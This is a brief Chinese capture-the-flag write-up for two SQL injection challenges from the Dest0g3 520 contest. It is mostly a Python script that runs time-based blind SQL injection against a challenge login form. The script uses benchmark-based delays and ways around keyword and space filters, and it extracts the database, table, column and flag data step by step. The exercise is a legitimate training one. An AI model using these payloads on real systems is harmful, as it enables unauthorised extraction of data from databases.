Dest0g3 520迎新赛两道SQL

Really Easy SQL

不管输入什么页面都回显一个信息有误，可以考虑延时注入。过滤sleep，substr，空格等。

import requests
import time
url="http://81e5fe2b-9fa9-454d-90b8-14ce7016a589.node4.buuoj.cn:81/"
def SQL_injection():
    res=""
    for i in range(1,100):
        mid=32
        while mid<128:
            #payload="'||if(ascii(mid((database()),%d,1))=%d,benchmark(2500000,sha(1)),0)||'"%(i,mid)
            #database()=ctf
            #payload="'||if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),%d,1))=%d,benchmark(3000000,sha(1)),0)||'"%(i,mid)
            #flaggg,user
            #payload="'||if(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='flaggg')),%d,1))=%d,benchmark(3000000,sha(1)),0)||'"%(i,mid)
            #cmd
            payload="'||if(ascii(mid((select(cmd)from(flaggg)),%d,1))=%d,benchmark(3000000,sha(1)),0)||'"%(i,mid)
            print(payload)
            begin_time=time.time()
            data={"username":payload, "password":"test"}
            r=requests.post(url=url, data=data)
            end_time=time.time()
            #print(end_time-begin_time)
            if (end_time-begin_time)>1:
                res+=chr(mid)
                break
            mid+=1
        if(mid==128):
            break
        print(res)
    print(res)

if __name__=="__main__":
    SQL_injection()

easysql

同exp。